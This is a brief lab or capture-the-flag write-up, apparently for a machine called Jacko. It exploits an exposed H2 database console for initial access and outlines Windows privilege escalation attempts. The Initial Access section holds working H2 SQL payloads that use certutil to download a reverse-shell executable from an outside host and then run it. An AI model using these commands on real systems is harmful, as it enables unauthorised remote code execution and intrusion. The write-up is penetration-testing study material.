Jacko 🔸

Enumeration

Web server is an H2 Java database welcome page.

At port 8082 we have the console.

Initial Access

We can access by clicking on connect.

Then we can execute arbitrary commands as seen in https://www.exploit-db.com/exploits/49384.

Once all commands are executed, we can upload a reverse shell and execute it.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.220/reverse.exe C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');

We have a restricted user, so reconstruct the path:

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0\;

Get the flag.

Privilege Escalation

Transfer winpeas.

We find a Paperstream IP program that seems out of the ordinary.

Searching for exploit.

Generate the reverse shell DLL and transfer them to the host.

Bug

It doesn't work with PaperStream method or abusing SeImpersonatePrivilege method (juicypotato, godpotato, printspoofer...)